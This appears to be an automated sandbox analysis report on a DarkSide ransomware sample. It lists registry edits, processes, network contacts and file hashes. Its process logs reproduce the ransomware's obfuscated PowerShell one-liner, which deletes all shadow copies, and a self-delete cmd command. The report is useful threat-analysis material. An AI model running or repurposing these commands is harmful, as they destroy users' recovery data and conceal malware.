Analysis Overview
SHA256
151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
Threat Level: Known bad
The file 151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5 was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
Deletes itself
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies Control Panel
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-05-18 20:48
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2021-05-18 20:48
Reported
2021-05-18 20:51
Platform
win10v20210410
Max time kernel
137s
Max time network
143s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\7b336f65.BMP" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b336f65.BMP" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65 | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65\ = "7b336f65" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65 | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\7b336f65.ico" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3872 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3872 wrote to memory of 2152 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3872 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3872 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3872 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe
"C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\151FBD~1.EXE >> NUL
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ea6243fdb2bfcca2211884b0a21a0afc |
| SHA1 | 2eee5232ca6acc33c3e7de03900e890f4adf0f2f |
| SHA256 | 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8 |
| SHA512 | 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0c2d3bf4ba8eb3735234f262ae3bddc5 |
| SHA1 | 997f7a1adf15a0c0982a5a37f0c83129b655c51d |
| SHA256 | e6548f346089f0597561abe61ebfd2d7a218ff647478c75896a009ec44d606c1 |
| SHA512 | 032a645383358790fbfd0c95767f22a1a027a291298ac51d6d9d404c3e3a40f4fede9aff92f7e9a71e28831a6ecb278be04130c893f20ef17ea016dd967337f0 |
Analysis: behavioral1
Detonation Overview
Submitted
2021-05-18 20:48
Reported
2021-05-18 20:51
Platform
win7v20210410
Max time kernel
74s
Max time network
65s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe
"C:\Users\Admin\AppData\Local\Temp\151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\151FBD~1.EXE >> NUL
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 13ad95ada4f65a17d044d047d9fd1570 |
| SHA1 | 3cab7b08dd95a2123ec628a2eb60cdc41472dd51 |
| SHA256 | 1e3f7b2b9f5b3f03030a51a17b9a9e68fd309fec3221fa901ccbc391bf51d582 |
| SHA512 | 936db0759eaed1c1e41147a85c3f772a7575f65c3eb02ddadc609a4bacd86b99112bf88e56c4105ce38f1ab36874812e3edaa5b1a36a910196b3b6dc0aeb7c47 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 0b176047694f22b25552fa6739bce32e |
| SHA1 | 03ff70b639bccc339714fe265e5b801d0733497d |
| SHA256 | 82ff29a428d59a1dd9902d782998cd2fa776b196a782c1196b0b9dbcb595b3eb |
| SHA512 | c32f341f40abe5be1d6577e4a6cb1bee1da16d4c3b9272203a76777394809e77888d3392757e827780303dfd63678258186756d2320eac63ce1d37d44aa6abad |